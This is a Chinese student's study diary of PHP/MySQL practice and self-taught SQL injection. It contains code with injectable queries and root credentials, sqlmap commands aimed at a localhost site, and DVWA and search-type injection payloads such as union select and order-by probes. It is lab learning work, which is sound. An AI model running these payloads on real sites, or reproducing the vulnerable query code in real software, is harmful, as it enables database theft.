张欢学习日记

Angelica

今天跟着写了个php链接数据库的代码
代码部分1

1.         <?php
   
2.         $link=mysqli_connect('localhost','root','123456');
   
3.        
   
4.         if(!$link){
   
5.                 exit('数据库连接失败');
   
6.         }
   
7.        
   
8.         mysqli_set_charset($link,'utf8');
   
9.        
   
10.         mysqli_select_db($link,'php.cn');
    
11.        
    
12.         $sql="select * from r1se";
    
13.        
    
14.         $obj=mysqli_query($link,$sql);
    
15.        
    
16.         echo '<table width="600" border="1">';
    
17.         echo '<th>编号</th> <th>姓名</th> <th>生日</th> <th>操作</th>';
    
18.        
    
19.         while($rows = mysqli_fetch_assoc($obj)){
    
20.                 echo'<tr>';
    
21.                 echo'<td>'.$rows['序号'].'</td>';
    
22.                 echo'<td>'.$rows['姓名'].'</td>';
    
23.                 echo'<td>'.$rows['生日'].'</td>';
    
24.                 echo'<td><a href="del.php?id='.$rows['序号'].'">删除</a></td>';
    
25.         }
    
26.         echo '</table>';
    
27.        
    
28.         mysqli_close($link);
    
29.         ?>

复制代码

代码部分2

1.         <?php       
   
2.         $id=$_GET['id'];
   
3.         $link=mysqli_connect('localhost','root','123456');
   
4.        
   
5.         if(!$link){
   
6.                 exit('数据库连接失败');
   
7.         }
   
8.        
   
9.         mysqli_set_charset($link,'utf8');
   
10.        
    
11.         mysqli_select_db($link,'php.cn');
    
12.        
    
13.         $sql="delete from r1se where 序号=$id";
    
14.        
    
15.         $boolean=mysqli_query($link,$sql);
    
16.                
    
17.         if($boolean && mysqli_affected_rows($link)){
    
18.                 echo'删除成功<a href="mysqli4.php">返回</a>';
    
19.         } else{
    
20.                 echo'删除失败';
    
21.         }
    
22.        
    
23.         mysqli_close($link);
    
24.        
    
25.         ?>

复制代码

中间出现了一些问题，通过百度成功解决。

代码运行结果

Angelica

今天：社工作业+python爬虫学习+burpsuite系列（一）（二）

Angelica

前段时间由于家里有事，啥也没干。
今天补了之前遗落的一部分网课and完成了数据表的导入。


数据表是通过excel文件导入的，导入过程中遇到了两个问题，一为文件不能打开，二为乱码问题。
第一个问题是通过在微软官网下载AccessDatebaseEngine解决的
第二个问题在百度上找了好几种解决方法，例如将文件改成.csv格式，以及在连接数据库时将编码选成自动，两种方法试过后，发现均无效。
然后我将该数据表存放在了一个之前创建的数据库里面，没有出现乱码问题。
通过翻找我当时创建该数据库的笔记对比发现，没有出现乱码的数据库是因为我之前创建的时候有一行命令为：set names utf8;
当时创建那个数据库的时候是跟着别人的代码敲的，没有细究用意，今天就顺便了解了一下。

然后成功解决了乱码问题。
同时跟着笔记复习了之前学的php链接数据库的方法，明天不出意外应该是设计页面+链接数据表。

Angelica

低估了我的高代作业，我向高代说声对不起。and仿造百度页面初步完成了页面设计+链接数据库

Angelica

基本完成老师上星期布置的任务



html部分代码

1. <!doctype html>
   
2. <html>
   
3. <head>
   
4. <meta charset="utf-8">
   
5. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1.0,uese-scalable=no "/>
   
6. <title>欢迎来到测试小站</title>
   
7.         <style type="text/css">
   
8.         @keyframes bounce {
   
9.                 from,20%,53%,80%,
   
10.                 to {
    
11.                         -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
    
12.                         transform: translate3d(0, 0, 0);
    
13.                         }
    
14.                 40%,43% {
    
15.                         -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    
16.                         animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    
17.                         -webkit-transform: translate3d(0, -30px, 0);
    
18.                         transform: translate3d(0, -30px, 0);
    
19.                         }
    
20. 
    
21.                 70% {
    
22.                         -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    
23.                         animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
    
24.                         -webkit-transform: translate3d(0, -15px, 0);
    
25.                         transform: translate3d(0, -15px, 0);
    
26.                         }
    
27.                 90% {
    
28.                         -webkit-transform: translate3d(0, -4px, 0);
    
29.                         transform: translate3d(0, -4px, 0);
    
30.                         }
    
31.                 }
    
32.                
    
33.                 .bounce {
    
34.                         -webkit-animation-name: bounce;
    
35.                         -webkit-transform-origin: center bottom;
    
36.                         transform-origin: center bottom;
    
37.                 }
    
38.                
    
39.                 body {
    
40.                         background-image:url("用于简历的图片/背景2.jpg");
    
41.                         background-position: center;
    
42.                         background-repeat: no-repeat;
    
43.                 }
    
44.                
    
45.                 h1{
    
46.                         text-align: center;
    
47.                         color:dodgerblue;
    
48.                         animation:bounce 1s;
    
49.                         animation-direction: alternate;
    
50.                         animation-iteration-count: 1;
    
51.                 }
    
52.                
    
53.                 #content{
    
54.                         height:450px;
    
55.                         width:100%;
    
56.                         text-align:center;
    
57.                         line-height:450px;
    
58.                 }
    
59.                
    
60.                 #search_txt{
    
61.                         border:1px solid #b8b8b8;
    
62.                         line-height:30px;
    
63.                 }
    
64.                
    
65.                 #search{
    
66.                         line-height:30px;
    
67.                         border:1px solid #3385ff;
    
68.                         background-color: #3385ff;
    
69.                         color:white;
    
70.                         margin-left:-8px;
    
71.                         font_size:16px;
    
72.                         width:100px;
    
73.                 }
    
74.                
    
75.         </style>
    
76. </head>
    
77. 
    
78. <body>
    
79.         <h1 >欢迎来到测试小站</h1>
    
80.         <form action="mysqli4.php" method="get">
    
81.         <div id="content">
    
82.         <input type="text" name="text" id="search_txt" size="80"/>
    
83.                 <input type="submit" value="Search" id="search" name="submit"/>
    
84.         </div>
    
85.         </form>
    
86. </body>
    
87. </html>
    

复制代码

php部分代码

1. <!doctype html>
   
2. <html>
   
3. <head>
   
4. <meta charset="utf-8">
   
5. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1.0,uese-scalable=no "/>
   
6. <title>查询结果页面</title>
   
7.         <style>
   
8.                 body {
   
9.                         background-color:antiquewhite
   
10.                 }
    
11.                 .css {
    
12.                         background: lightyellow;
    
13.                 }
    
14.                 .result{
    
15.                         text-align: center;
    
16.                 }
    
17.         </style>
    
18.        
    
19. <body>
    
20.         <?php
    
21.         echo "<h1 class=result>THE RESULT</h1>";
    
22.         echo "<div class=css>";
    
23. 
    
24.         if(empty($_GET['sunmit'])){
    
25.                 $keyword=$_GET['text'];
    
26.         }
    
27.        
    
28.         $link=mysqli_connect('localhost','root','123456');
    
29.        
    
30.         mysqli_set_charset($link,'utf8');
    
31.        
    
32.         mysqli_select_db($link,'php.cn');
    
33.        
    
34.         $sql="select * from 工作表1 where 姓名 like '%{$keyword}%'";
    
35.        
    
36.         $res=mysqli_query($link,$sql);
    
37.                
    
38.         echo '<table border="1" style="margin:0 ">';
    
39.        
    
40.         echo '<th>姓名</th>
    
41.         <th>性别</th>
    
42.         <th>生日</th>
    
43.         <th>年龄</th>
    
44.         <th>籍贯</th>
    
45.         <th>民族</th>
    
46.         <th>QQ</th>
    
47.         <th>联系方式</th>
    
48.         <th>微信</th>
    
49.         <th>爱好</th>
    
50.         <th>学历</th>
    
51.         <th>所在学院</th>
    
52.         <th>专业</th>
    
53.         <th>学号</th>
    
54.         <th>玩的游戏</th>
    
55.         <th>偶像</th>
    
56.         <th>抖音号</th>
    
57.         <th>微博</th>
    
58.         <th>注册过的网站</th>
    
59.         <th>外语水平</th>';
    
60.        
    
61.         while($rows=mysqli_fetch_array($res)){
    
62.                 echo '<tr>';
    
63.                 echo '<td>'.$rows['姓名'].'</td>';
    
64.                 echo '<td>'.$rows['性别'].'</td>';
    
65.                 echo '<td>'.$rows['生日'].'</td>';
    
66.                 echo '<td>'.$rows['年龄'].'</td>';
    
67.                 echo '<td>'.$rows['籍贯'].'</td>';
    
68.                 echo '<td>'.$rows['民族'].'</td>';
    
69.                 echo '<td>'.$rows['QQ'].'</td>';
    
70.                 echo '<td>'.$rows['联系方式'].'</td>';
    
71.                 echo '<td>'.$rows['微信'].'</td>';
    
72.                 echo '<td>'.$rows['爱好'].'</td>';
    
73.                 echo '<td>'.$rows['学历'].'</td>';
    
74.                 echo '<td>'.$rows['所在学院'].'</td>';
    
75.                 echo '<td>'.$rows['专业'].'</td>';
    
76.                 echo '<td>'.$rows['学号'].'</td>';
    
77.                 echo '<td>'.$rows['玩的游戏'].'</td>';
    
78.                 echo '<td>'.$rows['偶像'].'</td>';
    
79.                 echo '<td>'.$rows['抖音号'].'</td>';
    
80.                 echo '<td>'.$rows['微博'].'</td>';
    
81.                 echo '<td>'.$rows['注册过的网站'].'</td>';
    
82.                 echo '<td>'.$rows['外语水平'].'</td>';
    
83.         }
    
84.                
    
85.         echo '</table>';
    
86.                
    
87.        
    
88.         mysqli_close($link);
    
89.        
    
90.         echo "</div>";
    
91.        
    
92.         ?>
    
93. </body>
    
94. </html>

复制代码

Angelica

今天在看雪论坛上找了sql注入问题视频看，做了一个最最最简单的尝试。将上面php代码部分的

1. $sql="select * from 工作表1 where 姓名 like '%{$keyword}%' ";

复制代码

改成

1. $sql="select * from 工作表1 where 姓名 like '%{$keyword}%' or 1=1";

复制代码

同样在搜索框输入“张“，出现的结果变成


同时今天成功安装了sqlmap

Angelica

4.21 & 4.22

昨天和今天看了老师发的微信文章sql注入部分，然后跟着看雪论坛上的一个sql的公开课做，对sql注入了解更深入。
几个简简单单的笔记：
检测是否存在sql注入

1. sqlmap.py -u"http://localhost:85/web/mysqli4.php?text=%E5%BC%A0&submit=Search"

复制代码

列出数据库名称

1. sqlmap.py -u"http://localhost:85/web/mysqli4.php?text=%E5%BC%A0&submit=Search" --dbs

复制代码

查看指定数据库的表名称

1. sqlmap.py -u"http://localhost:85/web/mysqli4.php?text=%E5%BC%A0&submit=Search" -D php.cn  --tables

复制代码

查看表的具体数据

1. sqlmap.py -u"http://localhost:85/web/mysqli4.php?text=%E5%BC%A0&submit=Search" -D php.cn  --T r1se --dump

复制代码

今天还在dvwa上进行了sql注入测试，但是不太成功，明天继续这个。

Angelica

在dvwa上进行sql测试的一些笔记
检测是否存在注入

1. '

复制代码

遍历数据库表

1. 1 or 1=1

复制代码

1. 1' or' 1' =' 1

复制代码

查询信息列表长度  注意--后面有空格

1. order by [num]

复制代码

例如：

1. 1' order by 1 -- ，1' order by 2 --，1' order by 3 --

复制代码

，到输入n时，页面报错，则查询结果为n-1列

获取数据库名、账户名、版本及操作系统信息

1. 1' and 1=2 union select user(),database() -- [code]
   
2. [code]1' and 1=2 union select version(),database() --

复制代码

1. 1' and 1=2 union select 1,@@global.version_compile_os from mysql.user --

复制代码

查询mysql数据库所有数据库及表

1. 1' and 1=2 union select 1,schema_name from information_schema.schemata --

复制代码

猜解表名

1. 1' and exists(select * from [表名]) --

复制代码

猜解字段名

1. 1' and exists(select [表名] from users) --

复制代码

注入

1. 1' and 1=2 union select first_name,last_name from users --

复制代码

Angelica

我们知道，按照注入点类型来分，sql注入包括数字型注入点，字符型注入点以及搜索型注入点。而我的php代码部分的sql语句为

1. $sql="select * from 工作表1 where 姓名 like '%{$keyword}%'";

复制代码

属于搜索型注入点。今天了解的正是这个。
在博客园上面看到的对搜索型注入点的解释


判断搜索型注入的方法


用来检测是否存在搜索型注入的几种语句

1. 'and 1=1 and '%'='
   
2. %' and 1=1--'
   
3. %' and 1=1 and '%'='

复制代码

然后我开始在我自己的网页中进行测试：
在文本框中输入

1. 张%'and 1=1 and '%'='

复制代码

返回的结果为

输入

1. 张%'and 1=2 and '%'='

复制代码

返回的结果为


综上，可以判断存在搜索型文本框注入。

在今天的练习中，还出现了如下问题

在百度上查找相同问题后，发现了一个解决方法。在原代码

1. $res=mysqli_query($link,$sql);

复制代码

之后，加上下列内容

1. if(!$res){
   
2.                 printf("Error:%s\n",mysqli_error($link));
   
3.                 exit();
   
4.         }

复制代码

就可以判断出代码出错的位置，从而进行修改。

Angelica

今天进行的是搜索型注入里的POST注入实战。
根据前面，我们知道存在文本框注入，接下来，利用语句

1. ' order by [num]#

复制代码

猜字段数
逐次更改数字去猜，直到报错为止
由此我们知道，字段数为20
接下来就是利用下面的语句，加上一些常见的表名，来猜解表名

1. 1' and exists(select * from [表名]) --

复制代码

从报错中，可以知道数据库名为php.cn
如果表名正确的话，返回的界面应该是这样的。

最后利用语句

1. 'or 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 #

复制代码

获取了数据表的全部内容

同时可以利用语句

1. 'or 1=1 union select 姓名,性别,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from [表名]#

复制代码

获得我们想要的内容